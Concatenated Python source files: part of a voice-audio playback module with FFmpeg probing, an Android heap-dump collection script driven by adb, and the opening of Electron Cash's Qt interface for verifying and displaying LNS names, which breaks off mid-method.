        return cls(source, bitrate=bitrate, codec=codec, **kwargs)  # type: ignore

    @classmethod
    async def probe(
        cls,
        source: str,
        *,
        method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
        executable: Optional[str] = None,
    ) -> Tuple[Optional[str], Optional[int]]:
        """|coro|

        Probes the input source for bitrate and codec information.

        Parameters
        ------------
        source
            Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
        method
            Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
        executable: :class:`str`
            Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.

        Raises
        --------
        AttributeError
            Invalid probe method, must be ``'native'`` or ``'fallback'``.
        TypeError
            Invalid value for ``probe`` parameter, must be :class:`str` or a callable.

        Returns
        ---------
        Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
            A 2-tuple with the codec and bitrate of the input source.
            Either element is ``None`` when probing failed.
        """
        method = method or 'native'
        executable = executable or 'ffmpeg'
        probefunc = fallback = None
        if isinstance(method, str):
            probefunc = getattr(cls, '_probe_codec_' + method, None)
            if probefunc is None:
                raise AttributeError(f"Invalid probe method {method!r}")
            if probefunc is cls._probe_codec_native:
                fallback = cls._probe_codec_fallback
        elif callable(method):
            probefunc = method
            fallback = cls._probe_codec_fallback
        else:
            raise TypeError("Expected str or callable for parameter 'probe', " \
                            f"not '{method.__class__.__name__}'")
        codec = bitrate = None
        loop = asyncio.get_event_loop()
        # FIX: previously this used `return codec, bitrate` inside a `finally`
        # block, which silently swallowed any in-flight exception (including
        # cancellation).  All return paths now fall through to the single
        # return at the bottom, preserving the original (None, None) results
        # on failure while no longer suppressing unexpected exceptions.
        try:
            codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable))  # type: ignore
        except Exception:
            if not fallback:
                _log.exception("Probe '%s' using '%s' failed", method, executable)
            else:
                _log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
                try:
                    codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable))  # type: ignore
                except Exception:
                    _log.exception("Fallback probe using '%s' failed", executable)
                else:
                    _log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
        else:
            _log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
        return codec, bitrate

    @staticmethod
    def _probe_codec_native(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
        # Derive the probe tool name: 'ffmpeg' -> 'ffprobe', 'avconv' -> 'avprobe'.
        exe = executable[:2] + 'probe' if executable in ('ffmpeg', 'avconv') else executable
        args = [exe, '-v', 'quiet', '-print_format', 'json', '-show_streams', '-select_streams', 'a:0', source]
        output = subprocess.check_output(args, timeout=20)
        codec = bitrate = None
        if output:
            data = json.loads(output)
            streamdata = data['streams'][0]
            codec = streamdata.get('codec_name')
            bitrate = int(streamdata.get('bit_rate', 0))
            # NOTE(review): max() enforces a *floor* of 512 kbps here; min()
            # (a cap at Opus's maximum) may have been intended, but this
            # matches the original behavior — TODO confirm upstream intent.
            bitrate = max(round(bitrate/1000), 512)
        return codec, bitrate

    @staticmethod
    def _probe_codec_fallback(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
        # ffmpeg with no output file exits non-zero but still prints stream
        # info to stderr (merged into stdout here); scrape it with regexes.
        args = [executable, '-hide_banner', '-i', source]
        proc = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        out, _ = proc.communicate(timeout=20)
        output = out.decode('utf8')
        codec = bitrate = None
        codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
        if codec_match:
            codec = codec_match.group(1)
        br_match = re.search(r"(\d+) [kK]b/s", output)
        if br_match:
            # NOTE(review): same 512-floor question as in _probe_codec_native.
            bitrate = max(int(br_match.group(1)), 512)
        return codec, bitrate

    def read(self) -> bytes:
        """Return the next Opus packet, or ``b''`` at end of stream."""
        return next(self._packet_iter, b'')

    def is_opus(self) -> bool:
        """Packets are already Opus encoded; the library sends them as-is."""
        return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
    """Wraps another :class:`AudioSource` and applies a volume multiplier.

    Only PCM sources are supported: sources whose :meth:`AudioSource.is_opus`
    returns ``True`` are rejected, since encoded Opus packets cannot be scaled.

    Parameters
    ------------
    original: :class:`AudioSource`
        The original AudioSource to transform.
    volume: :class:`float`
        The initial volume to set it to.
        See :attr:`volume` for more info.

    Raises
    -------
    TypeError
        Not an audio source.
    ClientException
        The audio source is opus encoded.
    """

    def __init__(self, original: AT, volume: float = 1.0):
        if not isinstance(original, AudioSource):
            raise TypeError(f'expected AudioSource not {original.__class__.__name__}.')
        if original.is_opus():
            raise ClientException('AudioSource must not be Opus encoded.')
        self.original: AT = original
        # Goes through the property setter below, which clamps the value.
        self.volume = volume

    @property
    def volume(self) -> float:
        """Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
        return self._volume

    @volume.setter
    def volume(self, value: float) -> None:
        # Negative volumes are meaningless; clamp at zero.
        self._volume = max(value, 0.0)

    def cleanup(self) -> None:
        """Delegate cleanup to the wrapped source."""
        self.original.cleanup()

    def read(self) -> bytes:
        pcm = self.original.read()
        # Scale 16-bit samples; the multiplier is capped at 200% on read.
        return audioop.mul(pcm, 2, min(self._volume, 2.0))
class AudioPlayer(threading.Thread):
    """Daemon thread that pumps audio frames from an AudioSource to a VoiceClient.

    Reads one frame per iteration from ``source`` and sends it through
    ``client.send_audio_packet``, pacing itself to one frame every ``DELAY``
    seconds.  Supports pause/resume, waits out voice disconnects, and invokes
    an optional ``after`` callback (with the error, or None) when playback ends.
    """
    # Seconds per Opus frame (FRAME_LENGTH is in milliseconds).
    DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
    def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
        threading.Thread.__init__(self)
        self.daemon: bool = True
        self.source: AudioSource = source
        self.client: VoiceClient = client
        # Called once with the final error (or None) after playback finishes.
        self.after: Optional[Callable[[Optional[Exception]], Any]] = after
        self._end: threading.Event = threading.Event()      # set -> exit the playback loop
        self._resumed: threading.Event = threading.Event()  # cleared -> paused
        self._resumed.set() # we are not paused
        self._current_error: Optional[Exception] = None
        # Shared with the client: set while the voice connection is up.
        self._connected: threading.Event = client._connected
        self._lock: threading.Lock = threading.Lock()
        if after is not None and not callable(after):
            raise TypeError('Expected a callable for the "after" parameter.')
    def _do_run(self) -> None:
        # Main playback loop; runs on this thread.
        self.loops = 0
        self._start = time.perf_counter()
        # getattr lookup speed ups
        play_audio = self.client.send_audio_packet
        self._speak(True)
        while not self._end.is_set():
            # are we paused?
            if not self._resumed.is_set():
                # wait until we aren't
                self._resumed.wait()
                continue
            # are we disconnected from voice?
            if not self._connected.is_set():
                # wait until we are connected
                self._connected.wait()
                # reset our internal data
                self.loops = 0
                self._start = time.perf_counter()
            self.loops += 1
            data = self.source.read()
            if not data:
                # Source exhausted: end playback.
                self.stop()
                break
            play_audio(data, encode=not self.source.is_opus())
            # Pace against the loop start time so timing error does not
            # accumulate across iterations.
            next_time = self._start + self.DELAY * self.loops
            # NOTE(review): adds DELAY on top of (next_time - now), i.e. the
            # sleep targets one frame beyond next_time — TODO confirm intended.
            delay = max(0, self.DELAY + (next_time - time.perf_counter()))
            time.sleep(delay)
    def run(self) -> None:
        try:
            self._do_run()
        except Exception as exc:
            # Remember the error so _call_after can report it.
            self._current_error = exc
            self.stop()
        finally:
            self._call_after()
            self.source.cleanup()
    def _call_after(self) -> None:
        # Invoke the user's after-callback (if any) with the final error,
        # or log the error ourselves when no callback was supplied.
        error = self._current_error
        if self.after is not None:
            try:
                # Run the after function
                after_return = self.after(error)
                # If what we got back was a coroutine, submit it to
                # the main event loop for processing
                if asyncio.coroutines.iscoroutine(after_return):
                    asyncio.run_coroutine_threadsafe(after_return, self.client.loop)
            except Exception as exc:
                _log.exception('Calling the after function failed.')
                exc.__context__ = error
                traceback.print_exception(type(exc), exc, exc.__traceback__)
        elif error:
            msg = f'Exception in voice thread {self.name}'
            _log.exception(msg, exc_info=error)
            print(msg, file=sys.stderr)
            traceback.print_exception(type(error), error, error.__traceback__)
    def stop(self) -> None:
        """End playback and release any pause-wait so the loop can exit."""
        self._end.set()
        self._resumed.set()
        self._speak(False)
    def pause(self, *, update_speaking: bool = True) -> None:
        """Pause playback; optionally clear the 'speaking' indicator."""
        self._resumed.clear()
        if update_speaking:
            self._speak(False)
    def resume(self, *, update_speaking: bool = True) -> None:
        """Resume playback; timing is reset so paused time is not 'caught up'."""
        self.loops = 0
        self._start = time.perf_counter()
        self._resumed.set()
        if update_speaking:
            self._speak(True)
    def is_playing(self) -> bool:
        return self._resumed.is_set() and not self._end.is_set()
    def is_paused(self) -> bool:
        return not self._end.is_set() and not self._resumed.is_set()
    def _set_source(self, source: AudioSource) -> None:
        # Swap sources atomically; pause/resume without touching 'speaking'.
        with self._lock:
            self.pause(update_speaking=False)
            self.source = source
            self.resume(update_speaking=False)
    def _speak(self, speaking: bool) -> None:
        # Best-effort: toggling the speaking state must not kill the thread.
        try:
            asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
        except Exception as e:
            _log.info("Speaking call in player failed: %s", e)
|
AutoDump.py | import os
import ConstResource as Res
import FunctionCommon as Fun
import FunctionPackage as FunPkg
import FunctionLauncher as FunLch
import GrabDump as Grab
from threading import Thread
# Toggle between quick debug timings and the real collection timings below.
debug = True
# APK build tags to profile; each resolves to an archive under Res.apk_path
# (tag + Res.pgk_suffix) — see refresh_with_apk().
pkg_list = ['35711', '50003']
collect_period = 5 * 60 if debug else 5 * 60 * 60 # total window: 5 min (debug) / 5 hours
collect_info_internal = 60 if debug else 30 * 60 # sampling interval: 1 min (debug) / 30 min
# Samples per APK; intended as collect_period / collect_info_internal (= 10),
# but the non-debug value is 10 - 1 = 9 — TODO confirm the off-by-one is deliberate.
collect_times = 2 if debug else 10 - 1 # collect_period / collect_info_internal
def main_process():
    """Spawn one collection thread per connected device."""
    for device in Fun.devices_list_with_connection_check():
        Thread(target=collect_dump_info, args=(device,)).start()
def collect_dump_info(dev):
    """Per-device worker: create the output directory, then profile each APK."""
    Fun.log('start thread for device:' + dev)
    out_dir = make_device_tag_dir(dev)
    for apk_tag in pkg_list:
        inspect_apk_dump_with_internal(apk_tag, dev, out_dir)
def inspect_apk_dump_with_internal(apk, dev, path):
    # Reinstall the APK and relaunch it first, so sampling always starts
    # from a fresh process state; then take the periodic samples.
    refresh_with_apk(dev, apk)
    collect_info_repeat_with_fixed_rate(apk, dev, path)
def collect_info_repeat_with_fixed_rate(apk, dev, path):
    """Take `collect_times` samples, sleeping `collect_info_internal` seconds
    after each one."""
    for _ in range(collect_times):
        information_collection(apk, dev, path)
        Fun.sleep(collect_info_internal)
def refresh_with_apk(dev, apk_tag):
    # Clean reinstall of the package under test, then start its launcher
    # (skipping the splash screen) so dumps reflect a fresh session.
    FunPkg.uninstall_and_install(dev, os.path.join(Res.apk_path, apk_tag + Res.pgk_suffix),
                                 Res.pkg_name)
    FunLch.start_launcher_omit_splash(dev)
def information_collection(apk_tag, dev, path):
    """Capture one sample: trigger a heap dump on the device, read meminfo,
    and persist both under `path`."""
    Fun.log('trigger gc')
    dump_dir = os.path.realpath(path)
    # Kick off the on-device heap dump, then give it time to complete.
    Fun.p_open(Res.adb_grab_heap_dump_file_with_pkg(dev, dump_dir, Res.pkg_name))
    Fun.sleep(10)
    meminfo_lines = Fun.p_open(Res.asb_shell_dump_mem_info(dev)).readlines()
    sample_name = apk_tag + Res.dump + Fun.current_time()
    dump_mem_info_store_to_file(sample_name, meminfo_lines, path)
    Grab.grab_dump_and_convert(dev, sample_name, dump_dir, Res.pkg_name)
def dump_mem_info_store_to_file(name, lines, path):
    """Write meminfo output lines to <path>/<name><txt_suffix>, creating
    the file first if it does not exist yet."""
    target = os.path.join(path, name + Res.txt_suffix)
    if not os.path.exists(target):
        Fun.p_open('touch ' + target)
    Fun.write_lines_into_file(target, lines)
def make_device_tag_dir(d):
    """Return (creating it if missing) the per-device output directory,
    named from the device model and bluetooth id joined by Res.underline."""
    model, bluetooth = Fun.parse_device_model_and_bluetooth(d)
    tag_dir = os.path.join(Res.output_path, model + Res.underline + bluetooth)
    Fun.make_dir_if_not_exist(tag_dir)
    return tag_dir
# Script entry point: starts collection for all connected devices as soon as
# this module is executed (note: also runs on import — there is no
# `if __name__ == '__main__'` guard, presumably intentional for this script).
main_process()
|
lnsqt.py | ##!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Electron Cash - A Bitcoin Cash SPV Wallet
# This file Copyright (c) 2019 Calin Culianu <calin.culianu@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
LNS related classes and functions - Qt UI related.
'''
# TODO: whittle these * imports down to what we actually use
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from .util import *
from .qrcodewidget import QRCodeWidget
import queue
import time
import requests
from typing import Tuple, List, Callable
from enum import IntEnum
from electroncash import lns
from electroncash import util
from electroncash import web
from electroncash.address import Address
from electroncash.i18n import _, ngettext
from electroncash.wallet import Abstract_Wallet
class VerifyingDialog(WaitingDialog):
    """A WaitingDialog specialized for LNS name verification.

    Adds an LNS icon next to the message label and an indeterminate
    progress bar, and marshals the ``on_success``/``on_error`` callbacks
    onto the main (GUI) thread.  Parameters mirror WaitingDialog; ``title``
    defaults to "Verifying LNS Name".
    """
    def __init__(self, parent, message, task, on_success=None, on_error=None, auto_cleanup=True,
                 *, auto_show=True, auto_exec=False, title=None, disable_escape_key=False):
        # FIX: the conditional must select the *lambda*, not live inside its
        # body.  Previously `lambda x: f(cb, x) if cb else None` always passed
        # a (no-op) wrapper even when no callback was supplied; with the
        # parentheses, a missing callback is passed through as None as the
        # `else None` clearly intended.
        main_thread_success_cb = (lambda x: util.do_in_main_thread(on_success, x)) if on_success else None
        main_thread_error_cb = (lambda x: util.do_in_main_thread(on_error, x)) if on_error else None
        super().__init__(parent, message, task, on_success=main_thread_success_cb,
                         on_error=main_thread_error_cb, auto_cleanup=auto_cleanup,
                         auto_show=False, auto_exec=False,
                         title=title or _('Verifying LNS Name'),
                         disable_escape_key=disable_escape_key)
        # Re-lay out the message label with the LNS icon to its left.
        hbox = QHBoxLayout()
        self._vbox.removeWidget(self._label)
        icon_lbl = QLabel()
        icon_lbl.setPixmap(QIcon(":icons/lns.png").pixmap(50))
        hbox.addWidget(icon_lbl)
        hbox.addWidget(self._label)
        self._vbox.addLayout(hbox)
        # Indeterminate ("busy") progress bar while verification runs.
        prog = QProgressBar()
        prog.setRange(0, 0)
        self._vbox.addWidget(prog)
        # Honor auto_show/auto_exec here, since we forced them off in super().
        if auto_show and not auto_exec:
            self.open()
        elif auto_exec:
            self.exec_()
        destroyed_print_error(self)
def verify_multiple_names(names : List[str], parent : MessageBoxMixin, wallet : Abstract_Wallet, timeout=10.0) -> int:
    ''' Pass a list of names and will attempt to verify them all in 1 pass.
    This is used by the Contacts tab to verify unverified LNS Names that
    may have been imported. Returns the number of successfully verified names
    or None on user cancel. '''
    if not len(names):
        return 0
    # De-duplicate before counting so the progress math is consistent.
    names = set(names)
    nnames = len(names)
    q = queue.Queue()
    def done_cb(thing):
        # Called from the network layer: a list means verified names, an
        # Exception means failure; anything else is treated as one error.
        if isinstance(thing, (Exception, list)):
            q.put(thing)
        else:
            q.put(None)
    ctr = 0
    def thread_func():
        # Runs inside the VerifyingDialog's worker thread; drains the queue
        # until every name is accounted for (verified or errored), or until
        # a queue read times out.
        nonlocal ctr
        wallet.lns.verify_name_asynch(name=names, success_cb=done_cb, error_cb=done_cb, timeout=timeout)
        errs = 0
        while ctr + errs < nnames:
            try:
                thing = q.get(timeout=timeout)
                if thing is None:
                    errs += 1
                elif isinstance(thing, Exception):
                    # Re-raising here makes the dialog invoke on_error.
                    raise thing
                else:
                    ctr += len(thing)
            except queue.Empty:
                return
    code = VerifyingDialog(parent.top_level_window(),
                           ngettext("Verifying {count} name please wait ...",
                                    "Verifying {count} names please wait ...", nnames).format(count=nnames),
                           thread_func, auto_show=False, on_error=lambda e: parent.show_error(str(e))).exec_()
    if code != QDialog.Accepted:
        # Dialog rejected/cancelled: distinguishable from "0 verified".
        return None
    return ctr
def resolve_lns(parent : MessageBoxMixin, name : str, wallet : Abstract_Wallet = None) -> Tuple[lns.Info, str]:
    ''' Throws up a WaitingDialog while it resolves an LNS Name.
    Goes out to network, verifies the name.
    Returns: a tuple of: (Info, lns_name)
    Argument `name` should be an LNS Name string of the form:
    satoshi.bch
    On failure throws up an error window and returns None.'''
    from .main_window import ElectrumWindow
    # Default the wallet from the parent window when possible.
    if isinstance(parent, ElectrumWindow) and not wallet:
        wallet = parent.wallet
    assert isinstance(wallet, Abstract_Wallet)
    # Local exception type: any Bad raised below is shown to the user and
    # converted into a None return.
    class Bad(Exception): pass
    try:
        lns_tup = wallet.lns.parse_string(name)
        if not lns_tup:
            raise Bad(_("Invalid LNS Name specified: {name}").format(name=name))
        results = None
        def resolve_verify():
            # Runs in the VerifyingDialog's worker thread; publishes results
            # via the enclosing scope as (Info, name) tuples.
            nonlocal results
            results = wallet.lns.resolve_verify(name)
            results = [(item,item.name) for item in results]
        code = VerifyingDialog(parent.top_level_window(),
                               _("Verifying LNS Name {name} please wait ...").format(name=name),
                               resolve_verify, on_error=lambda e: parent.show_error(str(e)), auto_show=False).exec_()
        if code == QDialog.Rejected:
            # user cancel operation
            return
        if not results:
            raise Bad(_("LNS Name not found: {name}").format(name=name) + "\n\n"
                      + _("Could not find the LNS Name specified. "
                          "It either does not exist or there may have been a network connectivity error. "
                          "Please double-check it and try again."))
        if len(results) > 1:
            # Ambiguous: let the user pick one of the matches.
            tup = multiple_result_picker(parent=parent, wallet=wallet, results=results)
            if not tup:
                # user cancel
                return
            results = [tup]
        info, _name = results[0]
        name = wallet.lns.fmt_info(info)
        if not isinstance(info.address, Address):
            raise Bad(_("Unsupported payment data type.") + "\n\n"
                      + _("The LNS Name {name} uses an account type that "
                          "is not supported by Electron Cash.").format(name=name))
        return info, info.name
    except Bad as e:
        parent.show_error(str(e))
        return None
class ButtonAssociatedLabel(QLabel):
    """A QLabel bound to a QAbstractButton: clicking the label clicks the button.

    If the button is disabled but has a tooltip, clicking the label shows
    that tooltip instead (unless the user was selecting text).
    """
    def __init__(self, *args, **kwargs):
        linked_button = kwargs.pop('button', None)
        super().__init__(*args, **kwargs)
        self.but = linked_button
        # Keep text selectable so users can still copy the label contents.
        self.setTextInteractionFlags(self.textInteractionFlags() | Qt.TextSelectableByMouse)

    def setButton(self, b : QAbstractButton):
        self.but = b

    def button(self) -> QAbstractButton:
        return self.but

    def mouseReleaseEvent(self, e):
        super().mouseReleaseEvent(e)
        if not self.but:
            return
        if self.but.isEnabled():
            self.but.click()
        elif self.but.toolTip() and not self.hasSelectedText():
            QToolTip.showText(QCursor.pos(), self.but.toolTip(), self)
def naked_button_style() -> str:
    """Build the stylesheet for the small flat ('naked') QPushButtons used
    in the lookup results and other associated widgets in this file."""
    sheet = 'QPushButton { border-width: 1px; padding: 0px; margin: 0px; }'
    if ColorScheme.dark_scheme:
        return sheet
    # Light theme: add an invisible border that highlights on hover.
    return sheet + ''' QPushButton { border: 1px solid transparent; }
        QPushButton:hover { border: 1px solid #3daee9; }'''
def button_make_naked(but: QAbstractButton) -> QAbstractButton:
    """Apply the flat 'naked' look (stylesheet + fixed size policy) to *but*
    and return the same button, for convenient call chaining."""
    but.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
    but.setStyleSheet(naked_button_style())
    return but
class InfoGroupBox(PrintError, QGroupBox):
    """A QGroupBox that renders a selectable grid of (lns.Info, formatted_name)
    items, two columns wide, with optional radio/checkbox selection buttons,
    per-item detail/copy buttons, and (optionally) the item's address."""
    class ButtonType(IntEnum):
        NoButton = 0 # If this is specified to button_type, then the buttons will be hidden. selectedItem and selectedItems will have undefined results.
        Radio = 1 # If specified, the on-screen buttons will be QRadioButtons and selectedItems() will always have 0 or 1 item.
        CheckBox = 2 # If specified, the on-screen buttons will be QCheckBox and selectedItems() may be a list of more than 1 result
    def __init__(self,
                 parent : QWidget, # widget parent for layout/embedding/etc
                 main_window : MessageBoxMixin, # may be same as 'parent'; will raise if not an ElectrumWindow instance
                 items: List[Tuple[lns.Info, str]] = [], # list of 1 or 2 tuple : Info[, formatted_string]
                 title : str = None,
                 button_type : ButtonType = ButtonType.Radio, # Note that if CheckBox, the buttonGroup will be made non-exclusive and selectedItems() may return more than 1 item.
                 extra_buttons : List[Callable[[Tuple[lns.Info, str]], QAbstractButton]] = [], # pass a list of callables that take a 2-tuple for each item and return a button
                 show_addresses : bool = True, # if False, the address label remains hidden
                 custom_contents_margins : Tuple[int] = None, # if specified, use this as the contents margins for the internal layout widget
                 ):
        from .main_window import ElectrumWindow
        assert isinstance(main_window, ElectrumWindow)
        super().__init__(parent)
        self.main_window = main_window
        self.wallet = self.main_window.wallet
        self.extra_buttons = extra_buttons or []
        self.show_addresses = bool(show_addresses)
        # Only accept a well-formed 4-number margins spec; anything else is
        # silently ignored and default margins are used.
        if isinstance(custom_contents_margins, (tuple, list)) and len(custom_contents_margins) == 4 and all(isinstance(x, (int, float)) for x in custom_contents_margins):
            self.custom_contents_margins = custom_contents_margins
        else:
            self.custom_contents_margins = None
        assert isinstance(self.wallet, Abstract_Wallet)
        self._setup()
        self.setItems(items=items, title=title, auto_resize_parent=False, button_type=button_type)
    def _setup(self):
        # One-time construction of the outer layout; self.w is a dummy
        # container that refresh() tears down and rebuilds on every call.
        self.w = QWidget(self)
        self.vbox = QVBoxLayout(self)
        self.vbox.setContentsMargins(0,0,0,0)
        self.vbox.addWidget(self.w)
        self._but_grp = QButtonGroup(self) # client code shouldn't use this but instead use selectedItems(), etc
        self.no_items_text = _('No LNS Names') # client code may set this directly
    def setItems(self,
                 items : List[Tuple[lns.Info, str]], # list of 1 or 2 tuple : Info[, formatted_string]
                 title = None, auto_resize_parent = True, sort=True,
                 button_type : ButtonType = ButtonType.Radio):
        # Normalize, (optionally) sort and store the items, then rebuild the UI.
        items = items or []
        nitems = len(items)
        title = ngettext("{number} LNS Name", "{number} LNS Names", nitems).format(number=nitems) if title is None else title
        wallet = self.wallet
        if items and (sort): #or len(items[0]) != 3):
            # sort items by formatted LNS Name string, also adding the string to
            # the items tuples; tuples now are modified to 2 elements:
            # (info, formatted_ca_string)
            # NOTE(review): the inner `else` branch below is unreachable since
            # the outer condition already requires `sort` to be truthy — it
            # appears to be a leftover from the commented-out outer condition.
            formatter = lambda x: (x[0], wallet.lns.fmt_info(x[0]))
            if sort:
                items = sorted((formatter(x) for x in items), key=lambda tup:tup[1])
            else:
                items = [formatter(x) for x in items]
        self._items = items
        self.button_type = button_type
        self.setTitle(title)
        self.refresh()
        if auto_resize_parent and self.parent():
            # Use a weak ref: the parent may be deleted before the timer fires.
            weakParent = util.Weak.ref(self.parent())
            QTimer.singleShot(0, lambda: weakParent() and weakParent().resize(weakParent().sizeHint()))
    def buttonGroup(self) -> QButtonGroup:
        ''' The button group id's will point to indices in self.items() '''
        return self._but_grp
    def checkItemWithInfo(self, info : lns.Info):
        ''' Pass an info object and the item that corresponds to that
        Info object will be checked. Pass None to uncheck all items. '''
        for i, item in enumerate(self._items):
            if info is None:
                self._but_grp.button(i).setChecked(False)
            elif item[0] == info:
                self._but_grp.button(i).setChecked(True)
    def items(self) -> List[Tuple[lns.Info, str]]:
        ''' The list of items on-screen. self.buttonGroup()'s ids will point
        to indices in this list.
        Returned list items are 2-tuples of:
        (Info, fmtd_lns_name: str) '''
        return self._items
    def selectedItem(self) -> Tuple[lns.Info, str]:
        ''' Returns the currently selected item tuple or None if none is selected '''
        items = self.selectedItems()
        if items:
            return items[0]
    def selectedItems(self) -> List[Tuple[lns.Info, str]]:
        ''' In multi-select mode (CheckBox mode), returns the currently selected
        items as a list of 2-tuple. '''
        ret = []
        buts = self._but_grp.buttons()
        for but in buts:
            if but.isChecked():
                which = self._but_grp.id(but)
                if which > -1 and which < len(self._items):
                    ret.append(self._items[which])
        return ret
    def refresh(self):
        """Rebuild the entire item grid from self._items, preserving any
        existing selection across the rebuild.  Grid geometry: each item
        occupies a 3-row by 5-column cell block (row*3, col*5)."""
        from .main_window import ElectrumWindow
        parent = self.main_window
        wallet = self.wallet
        items = self._items
        button_type = self.button_type
        assert all(len(x) == 2 for x in items)
        but_grp = self._but_grp
        cols, col, row = 2, 0, -1
        # NOTE: _setup() always assigns self.w, so this branch always runs and
        # saved_selection (used at the bottom) is always bound.
        if self.w:
            # save selection
            saved_selection = [tup[0] for tup in self.selectedItems()]
            # tear down the dummy container widget from before and everything
            # in it
            for c in self.findChildren(QAbstractButton, "InfoGroupBoxButton"):
                if isinstance(c, QAbstractButton):
                    but_grp.removeButton(c)
            self.w.hide()
            self.vbox.removeWidget(self.w)
            self.w.setParent(None)
            self.w.deleteLater()
            self.w = None
        self.w = w = QWidget(self)
        self.vbox.addWidget(w)
        grid = QGridLayout(w)
        if self.custom_contents_margins:
            grid.setContentsMargins(*self.custom_contents_margins)
        def details_link_activated(lnsstr):
            if isinstance(parent, ElectrumWindow):
                lns_detail_dialog(parent, lnsstr)
        def view_addr_link_activated(addr):
            if isinstance(parent, ElectrumWindow):
                try:
                    address = Address.from_string(addr)
                    parent.show_address(address, parent=parent.top_level_window())
                except Exception as e:
                    parent.print_error(repr(e))
        # We do it this way with BUTTON_FACTORY in case we want to expand
        # this facility later to generate even more dynamic buttons.
        if button_type == __class__.ButtonType.CheckBox:
            BUTTON_FACTORY = lambda *args: QCheckBox()
            but_grp.setExclusive(False)
        else:
            BUTTON_FACTORY = lambda *args: QRadioButton()
            but_grp.setExclusive(True)
        hide_but = button_type == __class__.ButtonType.NoButton
        grid.setVerticalSpacing(4)
        if not items:
            # Placeholder label spanning the whole grid when there is nothing to show.
            label = WWLabel("<i>" + self.no_items_text + "</i>")
            label.setAlignment(Qt.AlignCenter)
            grid.addWidget(label, 0, 0, -1, -1)
        for i, item in enumerate(items):
            col = col % cols
            if not col:
                row += 1
            info, lns_string = item
            lns_string_em = info.name
            # Radio button (by itself in column 0)
            rb = BUTTON_FACTORY(info, "", lns_string, lns_string_em)
            rb.setObjectName("InfoGroupBoxButton")
            rb.setHidden(hide_but)
            rb.setDisabled(hide_but) # hidden buttons also disabled to prevent user clicking their labels to select them
            is_valid = True
            is_mine = False
            is_change = False
            assert isinstance(info.address, Address)
            if wallet.is_mine(info.address):
                is_mine = True
                is_change = wallet.is_change(info.address)
            but_grp.addButton(rb, i)
            grid.addWidget(rb, row*3, col*5, 1, 1)
            pretty_string = lns_string
            # LNS Name
            lns_lbl = ButtonAssociatedLabel(f'<b>{pretty_string}</b>', button=rb)
            grid.addWidget(lns_lbl, row*3, col*5+1, 1, 1)
            # Details
            details = _("Details")
            details_lbl = WWLabel(f'<font size=-1><a href="{lns_string}">{details}...</a></font>')
            details_lbl.setToolTip(_("View Details"))
            grid.addWidget(details_lbl, row*3, col*5+2, 1, 1)
            # misc buttons
            hbox = QHBoxLayout()
            hbox.setContentsMargins(0,0,0,0)
            hbox.setSpacing(4)
            for func in self.extra_buttons:
                if callable(func):
                    ab = func(item)
                    if isinstance(ab, QAbstractButton):
                        button_make_naked(ab)
                        hbox.addWidget(ab)
            # copy button
            copy_but = QPushButton(QIcon(":icons/copy.png"), "")
            button_make_naked(copy_but)
            hbox.addWidget(copy_but)
            grid.addLayout(hbox, row*3, col*5+3, 1, 1)
            # end button bar
            if isinstance(parent, ElectrumWindow):
                details_lbl.linkActivated.connect(details_link_activated)
                # Bind loop variables as lambda defaults so each button copies
                # its own name (late-binding closure pitfall avoided).
                copy_but.clicked.connect(lambda ignored=None, name=lns_string_em, copy_but=copy_but:
                                             parent.copy_to_clipboard(text=name, tooltip=_('LNS Name copied to clipboard'), widget=copy_but) )
                copy_but.setToolTip('<span style="white-space:nowrap">'
                                    + _("Copy <b>{text}</b>").format(text=lns_string_em)
                                    + '</span>')
            else:
                details_lbl.setHidden(True)
                copy_but.setHidden(True)
            if self.show_addresses:
                addr_lbl = ButtonAssociatedLabel('', button=rb)
                if is_valid:
                    if is_mine:
                        addr_lbl.setText(f'<a href="{info.address.to_ui_string()}"><pre>{info.address.to_ui_string()}</pre></a>')
                        addr_lbl.linkActivated.connect(view_addr_link_activated)
                        addr_lbl.setToolTip(_('Wallet') + ' - ' + (_('Change Address') if is_change else _('Receiving Address')))
                        addr_lbl.setButton(None) # disable click to select
                    else:
                        addr_lbl.setText(f'<pre>{info.address.to_ui_string()}</pre>')
                else:
                    addr_lbl.setText('<i>' + _('Unsupported Account Type') + '</i>')
